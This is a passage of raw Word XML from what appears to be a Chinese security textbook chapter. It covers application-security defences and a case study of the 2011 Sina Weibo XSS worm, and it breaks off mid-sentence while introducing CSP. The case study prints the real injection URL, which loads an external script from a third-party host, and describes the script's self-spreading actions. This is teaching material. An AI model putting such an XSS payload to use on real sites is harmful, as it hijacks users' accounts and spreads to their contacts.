      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全，社交网络安全等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6B02D6" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另外一种形式是，逻辑上用户的数据时分离的，但是物理上存在相同一片区域，因此攻击者通过一些漏洞，访问其他用户数据，造成一定程度的数据泄露，这种攻击形式存在于云计算安全中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1758878A" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）攻击者利用各种软硬件漏洞进行攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A546AA9" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于现有计算机体系结构复杂，各种硬件、软件的实现过于异构，很难确保完全没有任何漏洞，并且漏洞的及时修复也存在问题。因此攻击者可以利用一些各种漏洞对网络应用进行攻击，从而达到其目的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538CB1B5" w14:textId="391B4C43" w:rsidR="00B3713F" w:rsidRDefault="001D451A" w:rsidP="00B3713F">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>3.2</w:t>
      </w:r>
      <w:r w:rsidR="00B3713F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用安全的基本防御原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578A3E33" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本节，针对应用安全问题的本质及共性原因，我们给出了应用安全防御的基本原理和实践规范。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D81155F" w14:textId="300ADC8D" w:rsidR="00B3713F" w:rsidRDefault="001D451A" w:rsidP="001D451A">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00B3713F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00B3713F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r w:rsidR="00B3713F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>身份认证与信任管理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1DDE78" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>身份认证是保证信息安全的第一道门户。用户在被确认身份之后在信息系统中根据身份所有的权限享受相应的信息服务。一般常用的身份认证的方式有：用户名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>口令、生物</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>物理特征、图灵测试等。对于网络中的大型实体应用来说，一般会利用公钥基础设施来进行身份的管理和认证。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EC45EE" w14:textId="49D27B6F" w:rsidR="00B3713F" w:rsidRDefault="001D451A" w:rsidP="001D451A">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t>2.2</w:t>
      </w:r>
      <w:r w:rsidR="00B3713F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B3713F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>隐私保护</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3343BF56" w14:textId="14E5F61A" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>隐私数据的泄露会引起严重的危险后果，通过身份认证和信任管理可以一定程度保护隐私，但是无法从数据本身保护。因此可以利用一些隐私保护算法或者技术来对隐私数据进行保护。常有的算法包括，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>匿名</w:t>
      </w:r>
      <w:r w:rsidR="00567E59">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00567E59">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00567E59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:instrText>REF _Ref61162920 \r \h</w:instrText>
      </w:r>
      <w:r w:rsidR="00567E59">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00567E59">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00567E59">
        <w:t>[6]</w:t>
      </w:r>
      <w:r w:rsidR="00567E59">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、差分隐私</w:t>
      </w:r>
      <w:r w:rsidR="00567E59">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00567E59">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00567E59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:instrText>REF _Ref61162910 \r \h</w:instrText>
      </w:r>
      <w:r w:rsidR="00567E59">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00567E59">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00567E59">
        <w:t>[7]</w:t>
      </w:r>
      <w:r w:rsidR="00567E59">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、隐私计算等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49101418" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同时为了保护隐私各个国家和政府都出台了相关法律法规，如美国的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HIPPA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PCI DSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FACT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，欧盟的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GDPR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，以及中国的《网络安全法》等等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DFABFF" w14:textId="61F3E866" w:rsidR="00B3713F" w:rsidRDefault="001D451A" w:rsidP="001D451A">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t>2.3</w:t>
      </w:r>
      <w:r w:rsidR="00B3713F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B3713F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用安全监控防御</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D60FDC" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在实践中，一定网络应用系统的漏洞是无法避免的，因此在网络发生被攻击、破坏的情况下，可以通过监控检测，快速识别、恢复网络应用的服务，减少损失。同时在网络系统各个点上部署安全防御措施，避免出现安全的木桶效应。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2B2391" w14:textId="739D7F4A" w:rsidR="00B3713F" w:rsidRPr="001D451A" w:rsidRDefault="000027C4" w:rsidP="001D451A">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>3.3</w:t>
      </w:r>
      <w:r w:rsidR="00B3713F" w:rsidRPr="001D451A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、典型案例分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240057CE" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本节，我们通过三个实际的网络安全案例，贯穿本章内容，讲解了在典型的网络场景中，攻击者如何进行攻击，同时也分析了攻击能够成功的本质原因是什么，以及如何进行安全防御。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C35436B" w14:textId="42635D0D" w:rsidR="00B3713F" w:rsidRDefault="00D51F46" w:rsidP="00D51F46">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>3.3</w:t>
      </w:r>
      <w:r w:rsidR="00B3713F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.1 Web</w:t>
      </w:r>
      <w:r w:rsidR="00B3713F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全的机密性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62682195" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2011</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>28</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日晚，新浪微博突然出现大规模的“微博病毒”，大量用户自动发送诸如：“郭美美事件的一些未注意到的细节”，“建党大业中穿帮的地方”，“让女人心动的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>句诗歌”，“这是传说中的神仙眷侣啊”，“惊爆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>范冰冰艳照真流出了”等等微博和私信，并自动关注一位名为</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hellosamy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的用户。这场攻击事件的背后就是一次典型的针对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cross Site Scripting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）中文名称</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>为跨站脚本攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDD366E" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跨站脚本攻击是指通过存在安全漏洞的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网站注册用户的浏览器内运行非法的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标签或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行的一种攻击。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的本质是：恶意代码未经过滤，与网站正常的代码混在一起；浏览器无法分辨哪些脚本是可信的，导致恶意脚本被执行。而由于直接在用户的终端执行，恶意代码能够直接获取用户的信息，或者利用这些信息冒充用户向网站发起攻击者定义的请求。在部分情况下，由于输入的限制，注入的恶意脚本比较短。但可以通过引入外部的脚本，并由浏览器执行，来完成比较复杂的攻击策略。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747E09FA" w14:textId="6B780C88" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虽然新浪及时的修复了漏洞，但是在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hellosamy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被封号之前约有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>30000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>名粉丝，也就是说有至少有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>30000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>名用户确实被感染过。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2D2501" w14:textId="77777777" w:rsidR="006F474D" w:rsidRDefault="006F474D" w:rsidP="006F474D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="795EF235" wp14:editId="4A7EDBE8">
            <wp:extent cx="4058285" cy="2461847"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="图片 1" descr="https://images2015.cnblogs.com/blog/381128/201607/381128-20160717221231061-2000634342.jpg"/>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381128/201607/381128-20160717221231061-2000634342.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId9">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect b="18757"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4058285" cy="2461847"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7785A58E" w14:textId="7FC72879" w:rsidR="006F474D" w:rsidRDefault="006F474D" w:rsidP="006F474D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>13.</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“微博病毒”截图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2251AADE" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>整个的攻击流程如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3214C19E" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、利用了新浪微博存在的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞，先使自己的微博“中毒”，在浏览器中加载如下地址即可：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6154A25D" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:t>http://weibo.com/pub/star/g/xyyyd%22%3E%3Cscript%20src=//www.2kt.cn/images/t.js%3E%3C/script%3E?type=update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E5AD12" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342D3281" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:t xml:space="preserve">http://weibo.com/pub/star/g/xyyyd"&gt;&lt;script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=//www.2kt.cn/images/t.js&gt;&lt;/script&gt;? type=update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F743B9" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、使用有道提供的短域名服务（这些网址目前已经“无害”）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEDE746" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如，通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://163.fm/PxZHoxn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，将链接指向：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCE44D1" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:t>http://weibo.com/pub/star/g/xyyyd%22%3E%3Cscript%20src=//www.2kt.cn/images/t.js%3E%3C/script%3E?type=update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D32DE57" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、当新浪登陆用户不小心访问到相关网页时，由于处于登录状态，会运行这个</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本做几件事情：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03889656" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发微博，让更多的人看到这些消息，自然也就有更多人受害；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FC15D8" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>b.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加关注，加</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2201270010</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关注，这应该就是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hellosamy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B74DDB3" w14:textId="166897F4" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="006F474D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>c.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发私信，给好友发私信传播这些链接；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66030EE3" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此次攻击是一场闹剧，但同时它的确破坏了微博系统的机密性，使得存储在系统中或在系统之间传输的信息被恶意的攻击者操控。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5F1A4B" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何防御相关攻击呢？其实可以通过一些简单的方法就可防御，比如设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CSP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
